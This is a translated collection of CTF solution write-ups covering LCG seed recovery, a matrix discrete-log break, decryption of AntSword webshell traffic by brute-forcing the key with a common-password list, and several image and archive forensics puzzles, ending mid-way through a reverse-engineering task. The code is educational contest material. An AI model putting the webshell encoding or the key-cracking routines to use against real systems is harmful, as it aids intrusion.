'****************************1**************************************************************************************************************************1*****0***************************************************************0**************************0*1************0****************************************0***********************************0*****************************************************************************************************************************************************0*********************', '*********************************************************************************************************0*********************************0*********************************1************00***0*******************************************************************************************1***************************************************************0************************************************************************************************1********************************11*******************************0*', '**1*******1************************************************************0*************************************************************************0*****************************************************0***************************************************************************************************************************************0***************************************************1***************************************************************0************************0***********************************', 
'***********************************************************************************************************************0*******************************************1*************************************1**************************************************************************************************************************0*******************************10*****************************************************************************1**********************************************0*****************************', '******************************************************************00*****************************************************************************************************************************************1****************************************************************************************************1***0******************************************0*************0*************************************************0*******0*****************************************************************1********************', '***************************************************************************************0**********1***1****0*****0*****************0********************************************************************************************************************************************************1***********0*****1***********1*****************************************************************************************************0*1*************************************0*******************************************************', 
'****************************************************************************************1***********************0********1*************1****************************************************************************************************************************************************************************************1***0*******1***************************0**********************0****************1************************************************************************************************************1**', '*********************************************************************************************************************0**************1******************************************************************************1********0****0********************************************1*******************************0******************1***************************************1*********************************************************0**********************************************************************1*********************', '********************0*************1*********************************************0*****************************************************************************************************************************************************1**********0**************************1******************************************************************1********************************************1*******************************************0****************************************************************************0**********', 
'*************************************************************************1***********************************************************0*************************************************************************1********************************0*************0*******************************************************************1**********************************************************************1********0*************************************************************************************************************']
from Crypto.Util.number import long_to_bytes  # a, b, c and the leaked bit patterns x come from the challenge data above
T = 64
def gen(s, M):
    # run the LCG for T steps modulo 2**M and return every state as a 512-char bit string
    xx = []
    for _ in range(T):
        s = (a * s + b) % 2**M
        xx.append(bin(s)[2:].zfill(512))
    return xx

def check_seed(s, length, comparison_list):
    # the low `length` bits of every state depend only on the low `length` bits of the seed,
    # so a candidate low-bit suffix can be checked against the known ('0'/'1', not '*') leaked bits
    seed = int(s, 2)
    X = gen(seed, length)
    for i in range(length):
        for j in range(T):
            if comparison_list[j][-i-1] != "*" and comparison_list[j][-i-1] != X[j][-i-1]:
                return False
    return True

XX = []  # store the valid seeds found
def find_possible_seeds(prefix=""):
    # extend the candidate one bit at a time from the low end, pruning inconsistent prefixes
    if len(prefix) == 512:
        if check_seed(prefix, len(prefix), x):
            XX.append(int(prefix, 2))
    else:
        for bit in ('0', '1'):
            new_prefix = bit + prefix
            if check_seed(new_prefix, len(new_prefix), x):
                find_possible_seeds(new_prefix)

find_possible_seeds()
print(XX)
for SEED in XX:
    print(long_to_bytes(c ^ SEED))
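Added example (not the writeup's code) of the same bit-by-bit recovery on a toy LCG with constructed 24-bit parameters and a constructed partial leak, so the search can be followed end to end: because (a*s + b) mod 2^k depends only on s mod 2^k, each new bit of the seed is fixed by checking only the low bits of the leaked states.

```python
from typing import List

M_BITS = 24          # state width (constructed; the challenge uses 512)
T_OUT = 6            # number of leaked outputs (constructed)
A_MUL = 1103515245   # constructed odd multiplier
B_INC = 12345        # constructed increment
SEED = 0xABCDEF      # constructed secret seed to recover


def lcg_states(seed: int, a: int, b: int, m_bits: int, count: int) -> List[int]:
    """Successive states of s -> (a*s + b) mod 2^m_bits, starting after the seed."""
    out, s = [], seed
    for _ in range(count):
        s = (a * s + b) % (1 << m_bits)
        out.append(s)
    return out


def leak_bits(states: List[int], m_bits: int, keep_every: int) -> List[str]:
    """Constructed leak: keep about 1/keep_every of each state's bits, '*' elsewhere."""
    pats = []
    for idx, s in enumerate(states):
        bits = bin(s)[2:].zfill(m_bits)
        pats.append(''.join(c if (i + idx) % keep_every == 0 else '*'
                            for i, c in enumerate(bits)))
    return pats


def consistent(suffix: str, pats: List[str], a: int, b: int) -> bool:
    """Check a candidate for the low k bits of the seed against the low k bits of every leak.

    (a*s + b) mod 2^k depends only on s mod 2^k, so the low k bits of each state are
    fully determined by the low k bits of the seed; that is what makes the search work.
    """
    k = len(suffix)
    for pat, s in zip(pats, lcg_states(int(suffix, 2), a, b, k, len(pats))):
        low = bin(s)[2:].zfill(k)
        for j in range(1, k + 1):
            if pat[-j] != '*' and pat[-j] != low[-j]:
                return False
    return True


def recover_seeds(pats: List[str], a: int, b: int, m_bits: int) -> List[int]:
    """Depth-first extension from the least significant bit upward, pruning dead prefixes."""
    found: List[int] = []

    def extend(suffix: str) -> None:
        if len(suffix) == m_bits:
            found.append(int(suffix, 2))
            return
        for bit in '01':
            cand = bit + suffix
            if consistent(cand, pats, a, b):
                extend(cand)

    extend('')
    return found


def demo() -> List[int]:
    """Leak half the bits of T_OUT states and recover every seed consistent with them."""
    pats = leak_bits(lcg_states(SEED, A_MUL, B_INC, M_BITS, T_OUT), M_BITS, 2)
    return recover_seeds(pats, A_MUL, B_INC, M_BITS)


if __name__ == '__main__':
    print([hex(s) for s in demo()])
```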
CRYPTO.04
✦✦✦ 7 QAQTAT
Steps:
Reference:
https://dexterjie.github.io/2024/12/01/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/2024%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/#QAQTAT%E2%80%94%E2%80%94Unsolved
Code:
# SageMath challenge source: ^ is exponentiation and ^^ is XOR
from Crypto.Util.number import *
from hashlib import sha256
from secret import flag
m = bytes_to_long(flag)
def enc(pt, G, A, T, S, p):
    s = randint(0,p-1)
    D = G^s
    E = A*T*A
    F = D*E*D
    K = list(D*S*D)
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    ct = pt ^^ mask
    return ct, F
def dec(ct, Q, F, p):
    K = Q*F*Q
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    pt = ct ^^ mask
    return pt
p = getPrime(256)
Fp2.<i> = GF(p^2, modulus=x^2+1)
M = MatrixSpace(Fp2, 3, 3)
while True:
    Q = M.random_element()
    A = M.random_element()
    if Q*A != A*Q:
        break
T = Q*A*Q
S = T*A*T
r1 = randint(0,p-1)
G = Q^r1
pk = (list(A), list(T), list(S), list(G))
ct, F = enc(m, G, A, T, S, p)
print("p =", p)
print("pk =", pk)
print("F =", list(F))
print("ct =", ct)
"""
p = 72887242108660141996862343556330151015969690949835567252527194788428065480383
pk = ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), 
(57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), 
(6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])
F = [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]
ct = 96910798667771988374291172958072220832574586618080134344021393928577220469428
"""
Step 1
from Crypto.Util.number import *
from hashlib import sha256
def enc(pt, G, A, T, S, p):
    s = randint(0,p-1)
    D = G^s
    E = A*T*A
    F = D*E*D
    K = list(D*S*D)
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    ct = pt ^^ mask
    return ct, F
p = 72887242108660141996862343556330151015969690949835567252527194788428065480383
Fp2.<i> = GF(p^2, modulus=x^2+1)
M = MatrixSpace(Fp2, 3, 3)
pk = ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), 
(57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), 
(6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])
F = [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]
ct = 96910798667771988374291172958072220832574586618080134344021393928577220469428
A, T, S, G = [M(ii) for ii in pk]
F = M(F)
############################################################### attack
E = A*T*A
# det(G^s) = det(G)^s, so the matrix problem collapses to discrete logs on determinants
detA, detT, detS, detG, detE, detF = A.det(), T.det(), S.det(), G.det(), E.det(), F.det()
r = 2244966557637008779362441591080406338119704738381872153797151
#R = 80839783875482453208291688688697485912290384775841712705111124172946909733768714734343762988749579725275997021760357500939
#r = discrete_log(detG^R, ((detA^(-1)*detT).sqrt())^R, ord=(p^2-1)//R)
#s = discrete_log(((detA^(-2)*detT^(-1)*detF).sqrt())^R, detG^R, ord=(p^2-1)//R)
#not enough so use cado-nfs
Sage's discrete_log is not enough here, so use cado-nfs.
Step 2
import subprocess
# t1 and t2 are the two GF(p) elements whose logarithms are needed (their definitions are not shown here)
def cado_dlp(target):
    # cado-nfs in DLP mode: -ell gives the prime subgroup order r, target= the element to take the log of
    command = [
        './cado-nfs.py',
        '-dlp',
        '-ell', str(r),
        'target=' + str(target),
        str(p)
    ]
    try:
        result = subprocess.run(command, check=True, text=True, capture_output=True)
        print(result.stdout)
    except subprocess.CalledProcessError as e:
        print(f"Return code: {e.returncode}")
        print("Error:", e.stderr)
for t in (t1, t2):
    cado_dlp(t)
# log of t1: 1541758195020130454925136833461872657607368759409055632195831
# log of t2: 780392429787953543532147509264510635118839088869098098140941
Step 3
#t2^s = t1
Fr = GF(r)
s1 = Fr(1541758195020130454925136833461872657607368759409055632195831)
s2 = Fr(780392429787953543532147509264510635118839088869098098140941)
# the part of s modulo the cofactor is small enough for Sage's discrete_log
ss = discrete_log(pow(t1, 6*r, p), pow(t2, 6*r, p), operation="*", ord=(p-1)//r)
s = crt([int(ss), int(s1/s2)], [(p-1)//(6*r), r])
ss = s
for ii in range(6):
    # the remaining factor of 6 is resolved by trying each lift
    s = ss + ii * (p-1) // 6
    D = G^int(s)
    K = list(D*S*D)
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    pt = ct ^^ mask
    if ((D*E*D).det() == detF):  # the right s reproduces the published F (compared via its determinant)
        print(long_to_bytes(pt))
        break
#QAQ~4_Br0ken_Crypto_Sy5tem~TAT
CRYPTO.05
✦✦✦ 8 ddd
Steps:
Solved in one go with a tool.
MISC.01
✦✦✦ 9 gza_Cracker
Steps:
The pass is Antsword.
The key is in here:
echo substr(md5($pass.$key),0,16);//prefix
echo base64_encode(encode(@run($data),$key)); //encrypted data
echo substr(md5($pass.$key),16); //suffix
e71f50e9773b23f9 is the prefix; the key can be brute-forced from it:
$keylist = array(
"123456",
"password",
"12345678",
"1234",
"admin@123",
"pussy",
"12345",
"dragon",
"qwerty",
"696969",
"mustang",
"letmein",
"baseball",
"master",
"michael",
"football",
"shadow",
"monkey",
"abc123",
"pass",
"fuckme",
"6969",
"jordan",
"harley",
"ranger",
"iwantu",
"jennifer",
"hunter",
"fuck",
"2000",
"test",
"batman",
"trustno1",
"thomas",
"tigger",
"robert",
"access",
"love",
"buster",
"1234567",
"soccer",
"hockey",
"killer",
"george",
"sexy",
"andrew",
"charlie",
"superman",
"asshole",
"fuckyou",
"dallas",
"jessica",
"panties",
"pepper",
"1111",
"austin",
"william",
"daniel",
"golfer",
"summer",
"heather",
"hammer",
"yankees",
"joshua",
"Antsw0rd",
"maggie",
"biteme",
"enter",
"ashley",
"thunder",
"cowboy",
"silver",
"richard",
"fucker",
"orange",
"merlin",
"michelle",
"corvette",
"bigdog",
"cheese",
"matthew",
"121212",
"patrick",
"martin",
"freedom",
"ginger",
"blowjob",
"nicole",
"sparky",
"yellow",
"camaro",
"secret",
"dick",
"falcon",
"taylor",
"111111",
"131313",
"123123",
"bitch",
"hello"
);
$pass = "Antsword";
foreach ($keylist as $key)
{
    if(substr(md5($pass.substr(md5($key), 0, 16)),0,16)=="e71f50e9773b23f9")
    {
        echo "key is: ".$key."<br>";
        echo "16bit: ".substr(md5($key), 0, 16);
    }
}
Once the key is obtained, decrypt:
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='Antsword';
$key = 'a18551e65c48f51e';
$str = "";  // the base64 body captured from the response
$data = encode(base64_decode($str), $key);
echo gzdecode($data);
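Added example (not the writeup's or AntSword's own code): the same prefix/body/suffix scheme in Python, to brute-force the key from the prefix as above and then verify and decode a captured response offline. The pass, the encoder password and the command output are constructed.

```python
import base64
import gzip
import hashlib
from typing import Iterable, Optional, Tuple


def derive_key(encoder_password: str) -> str:
    """Key as used above: first 16 hex chars of md5(encoder password)."""
    return hashlib.md5(encoder_password.encode()).hexdigest()[:16]


def xor_encode(data: bytes, key: str) -> bytes:
    """Same as the PHP encode(): byte i is XORed with key[(i+1) & 15]; it is its own inverse."""
    k = key.encode()
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))


def build_response(output: bytes, password: str, key: str) -> str:
    """prefix(16) + base64(xor(gzip(output))) + suffix(16), mirroring the three echo lines."""
    h = hashlib.md5((password + key).encode()).hexdigest()
    body = base64.b64encode(xor_encode(gzip.compress(output), key)).decode()
    return h[:16] + body + h[16:]


def decode_response(resp: str, password: str, key: str) -> Optional[bytes]:
    """Verify prefix/suffix for this pass/key pair, then strip, XOR and gunzip the body."""
    h = hashlib.md5((password + key).encode()).hexdigest()
    if len(resp) < 32 or resp[:16] != h[:16] or resp[-16:] != h[16:]:
        return None   # not produced with this pass/key pair
    try:
        return gzip.decompress(xor_encode(base64.b64decode(resp[16:-16]), key))
    except (ValueError, OSError, EOFError):
        return None


def find_key(prefix: str, password: str, candidates: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Wordlist search for the encoder password whose derived key reproduces the prefix."""
    for cand in candidates:
        key = derive_key(cand)
        if hashlib.md5((password + key).encode()).hexdigest()[:16] == prefix:
            return cand, key
    return None


if __name__ == '__main__':
    # constructed sample: pass "Antsword", encoder password "Antsw0rd", fake command output
    key = derive_key("Antsw0rd")
    resp = build_response(b"uid=33(www-data) gid=33(www-data)\n", "Antsword", key)
    print(find_key(resp[:16], "Antsword", ["123456", "password", "Antsw0rd"]))
    print(decode_response(resp, "Antsword", key))
```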
MISC.02
✦✦✦ 10 不良劫
Steps:
Reference (2024 Tianshan Guwang Cup finals):
https://blog.jacki.cn/2024/11/29/%E5%A4%A9%E5%B1%B1%E5%9B%BA%E7%BD%91/#CRYPTO-ddd
Adjust the levels in Photoshop so that the non-pure-black pixels stand out.
Then restore and repair the finder patterns.
Scan the code with WeChat: this gives the first half of the flag, DASCTF{014c6e74-0c4a-48fa
Extract the blind watermark with WaterMarkH to get the second half, -8b33-ced16f847e39}
Flag:
DASCTF{014c6e74-0c4a-48fa-8b33-ced16f847e39}
MISC.03
✦✦✦ 11 马赛克
Steps:
Load the image with a forensics tool.
A flag archive is found; opening it shows the file is corrupted.
A password file is also found.
It turns out to be a picture; change the extension and open it, and the password is mosaicked.
Shrinking the picture, the password can roughly be guessed as ILIKEFORENSICS.
A strange txt file, "打乱.txt" (scramble.txt), is also found in the image.
Exporting and opening it reveals the scrambling algorithm.
After restoring, delete the extra zeros, extract with the password and get the flag.
```
f = open('./flag.zip', 'rb').read()
n = open('./new.zip', 'wb')
L = len(f)
for i in range(int(L/10)):
    n.write(f[5*i :5*i+5])
    n.write(f[L-5*i-5:L-5*i])
```
Restore the archive:
```
with open(r"C:\Users\Crazy\Desktop\flag.zip",'rb') as f:
    tmp = f.read()
L = len(tmp)
print(L)
o_f_zip = bytearray(L)
for i in range(L//10):
    # scrambled bytes 10i..10i+5 came from the front, 10i+5..10i+10 from the back
    o_f_zip[5*i:5*i+5] = tmp[10*i:10*i+5]
    o_f_zip[L-5*i-5:L-5*i] = tmp[10*i+5:10*i+10]
with open(r"C:\Users\Crazy\Desktop\flag2.zip",'wb') as f2:
    f2.write(o_f_zip)
```
MISC.04
✦✦✦ 12 特殊的流量
Steps:
Look for packets with response code 200; one of them carries an archive.
The substituted key can be seen.
edffd5be04cc060e343cad479a8b845c is the MD5 hash of the secret.
import hashlib
import itertools
# original MD5 hash
original_md5 = "edffd5be04cc060e343cad479a8b845c"
# ciphertext after substitution
ciphertext = "xx34d619x1brxgd9mgd4xzxwxytv669wn"
# replacement character set
replacement_chars = ['i', '7', 'x']
# positions of the x characters
x_positions = [i for i, char in enumerate(ciphertext) if char == 'x']
# every x position is replaced by one of the replacement characters
def generate_candidates():
    # generate every possible substitution combination
    for replacement in itertools.product(replacement_chars, repeat=len(x_positions)):
        # put the replacement characters into the ciphertext at their positions
        candidate = list(ciphertext)
        for pos, replacement_char in zip(x_positions, replacement):
            candidate[pos] = replacement_char
        yield ''.join(candidate)
# compare the MD5 of every candidate
def crack():
    for candidate in generate_candidates():
        # compute the candidate's MD5
        candidate_md5 = hashlib.md5(candidate.encode()).hexdigest()
        if candidate_md5 == original_md5:
            print(f"Found the original ciphertext: {candidate}")
            return candidate
    print("No match found.")
    return None
if __name__ == "__main__":
    # run the cracking process
    crack()
Brute force yields the plaintext:
i734d619i1brigd9mgd4xz7w7ytv669w
Further down, a pile of ciphertext is written to flag.txt:
U2FsdGVkX18tplkP51SopY26cczUyjuT8tP9j3Ofqv5XF5njA7CygY125iYhxplSQTNoT/kcwoN1z+4a4r/+9JtONfutcHXoyCv2tLseBHr802V/RRtFaZnZc3DM/trRmjk5SAyMSgvN+laSp6uK8eAOq7yKWq7FI+En5cu+j7+bxiuceviSoJ9gEw3SfEMtz4rYbKHagq8aCAlKPEevM+HVSnGSrMoy6QS8oQPgHkafdVj2m1HmfkdQFL5q7qYvrxVlRLbm657I0VIIusf8Q6+rsvlh28HrE3MzLlu6fd/cQ7nsZKuKYo0u4pc/yvI3RZglrd7Fb6piO4ryhs2g1g==
Decrypt it with a tool.
Take the first letter of each non-numeric English word; after conversion this gives the flag.
Flag:
DASCTF{3fd34b59-4e9d-4390-927b-1346d5364d99}
MISC.05
✦✦✦ 13 PixMatrix
Steps:
As the challenge description says, apply a block-level transpose to the image.
```python
from PIL import Image
import numpy as np

def swap_quadrants(block):
    """
    Swaps the top-right and bottom-left quadrants of an 8x8 block.
    Parameters:
        block (numpy.ndarray): An 8x8 (or block_size x block_size) array representing the
        image block.
    Returns:
        numpy.ndarray: The block with swapped quadrants.
    """
    half = block.shape[0] // 2
    top_right = block[:half, half:].copy()
    bottom_left = block[half:, :half].copy()
    # Swap the quadrants
    block[:half, half:] = bottom_left
    block[half:, :half] = top_right
    return block

def blockwise_transpose(image, block_size=8):
    """
    Performs a block-wise transpose on the given image by swapping specific quadrants
    within each block.
    Parameters:
        image (PIL.Image.Image): The input image to be processed.
        block_size (int): The size of each block (default is 8).
    Returns:
        PIL.Image.Image: The transposed image.
    """
    width, height = image.size
    image_array = np.array(image)
    # Handle grayscale images by ensuring consistent dimensions
    if image_array.ndim == 2:
        image_array = image_array[:, :, np.newaxis]
    channels = image_array.shape[2]
    transposed_array = image_array.copy()
    for y in range(0, height, block_size):
        for x in range(0, width, block_size):
            # Extract the block
            block = image_array[y:y + block_size, x:x + block_size].copy()
            # Ensure the block is the correct size (it might be smaller at the edges)
            if block.shape[0] < block_size or block.shape[1] < block_size:
                continue
            # Swap quadrants within the block
            transposed_block = swap_quadrants(block)
            # Assign the transposed block back to the array
            transposed_array[y:y + block_size, x:x + block_size] = transposed_block
    # Remove the singleton dimension for grayscale images
    if transposed_array.shape[2] == 1:
        transposed_array = transposed_array.reshape((height, width))
    return Image.fromarray(transposed_array)

def process_image(input_path, output_path, block_size=8, display=False):
    """
    Processes the image by performing a block-wise transpose and saves the result.
    Parameters:
        input_path (str): Path to the input image.
        output_path (str): Path to save the transposed image.
        block_size (int): The size of each block (default is 8).
        display (bool): Whether to display the transposed image (default is False).
    """
    try:
        # Open the image
        with Image.open(input_path) as img:
            # Perform block-wise transpose
            transposed_img = blockwise_transpose(img, block_size)
            # Save the transposed image
            transposed_img.save(output_path)
            print(f"Transposed image saved as {output_path}.")
            # Optionally display the image
            if display:
                transposed_img.show()
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # Define input and output paths
    input_image_path = "PixMatrix.jpg"  # Update with your image file
    output_image_path = "transposed_image.jpg"  # Update with desired output path
    # Process the image
    process_image(input_image_path, output_image_path, block_size=8, display=True)
```
REVERSE.01
✦✦✦ 14 bouquet
Steps:
No packer, 32-bit. The challenge says there is junk code (花指令), so look for the bytes IDA highlights in red;
